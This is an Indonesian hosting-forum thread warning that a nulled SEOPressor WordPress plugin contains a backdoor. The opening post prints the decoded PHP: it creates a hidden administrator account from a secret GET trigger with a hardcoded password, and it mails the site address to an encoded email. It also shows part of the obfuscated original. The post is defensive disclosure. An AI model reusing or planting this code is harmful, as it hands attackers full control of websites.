Hati2 SEOPressor Nulled, Ada Backdoor-nya $OOO0O0O00

Discussion in 'Desain Web dan Programming' started by PusatHosting, 19 Oct 2015.

Thread Status:
Not open for further replies.
  1. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,333
    Likes Received:
    326
    Trophy Points:
    83
    Baru saja menemukan file agak aneh milik client di plugin seopressor dan setelah googling akhirnya menemukan bahwa file tersebut merupakan bawaan dari plugin seopressor yang nulled.

    hasil decode dengan unphp http://www.unphp.net/decode/d53ec81359b31def2888105e0462a5a1/
    Code:
    <?php ?><?php
    add_action('wp_head', 'vg4beaws');
    function vg4beaws() {
    If ($_GET['cms'] == 'jjoplmh') {
    require ('wp-includes/registration.php');
    If (!username_exists('wordpress')) {
    $user_id = wp_create_user('wordpress', 'gh67io9Cjm');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    }
    }
    }
    add_action('wp_head', 'm6yascfv');
    function m6yascfv() {
    If (!username_exists('wordpress')) {
    $addressdecode = base64_decode("cGhpbGx5Y2hhZEBnbXguY29t");
    $vari = 'Wordpress Plugin covertplayer';
    mail($addressdecode, get_bloginfo('wpurl'), $vari);
    }
    }
    ?><?php
    
    sebagian dari script aslinya ini
    Code:
    <?php //
    $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=23904;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO000
    
    Jika plugin aktif maka hacker bisa dengan mudah meng-insert user baru dengan level akses administrator dan selanjutnya hacker bisa melakukan apapun pada website target.

    Silahkan dimasukkan ke database scan manual karena maldet belum bisa mendeteksi dan kalau menggunakan http://www.abuseat.org/findbot.pl bisa tapi sayang tidak mengirim email alert.

    Sumber lain : http://bestblackhatforum.com/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates?page=7
     
  2. pluto01

    pluto01 Hosting Guru Web Hosting

    Messages:
    3,648
    Likes Received:
    753
    Trophy Points:
    113
    Thanks sharednya Mas
     
  3. susan

    susan Apprentice 1.0

    Messages:
    287
    Likes Received:
    37
    Trophy Points:
    28
    bisa dishare md5 hash utk filenya, thanks
     
  4. Indodata

    Indodata Apprentice 1.0

    Messages:
    325
    Likes Received:
    35
    Trophy Points:
    28
    Beberapa yang saya temukan seperti theme nulled, plugin terkadang disisipin sesuatu ntah itu backdor, cryptoPHP dll
    Sebaiknya gunakan versi asli atau cari yang free yang powerfull.
     
  5. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,333
    Likes Received:
    326
    Trophy Points:
    83
    Filternya berdasarkan string yang ada di dalamnya saja tidak menggunakan md5
     
  6. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,352
    Likes Received:
    105
    Trophy Points:
    63
    terima kasih sharenya mas mungkin bisa kita cek ricek :)
     
  7. idnix

    idnix Hosting Guru

    Messages:
    1,003
    Likes Received:
    189
    Trophy Points:
    63
    nulled emang rata2 begitu kan om?
     
    PelajarHosting likes this.
  8. sigmabisnis

    sigmabisnis Hosting Guru Web Hosting (Company)

    Messages:
    2,181
    Likes Received:
    144
    Trophy Points:
    63
    Thanks for infonya mas.
     
  9. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,333
    Likes Received:
    326
    Trophy Points:
    83
    Iya betul, tapi untuk seopressor ini semenjak saya beli masih murah beberapa tahun lalu baru kali ini tahu ada nulled-nya dan ada backdoornya lagi.
     
  10. masiqbal

    masiqbal Expert 2.0

    Messages:
    862
    Likes Received:
    249
    Trophy Points:
    43
    Masalahnya banyak orang awam yg tidak tahu resiko menggunakan unofficial plugin (apalagi nulled), yg dia pikir hanya bagaimana caranya agar websitenya bagus.
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...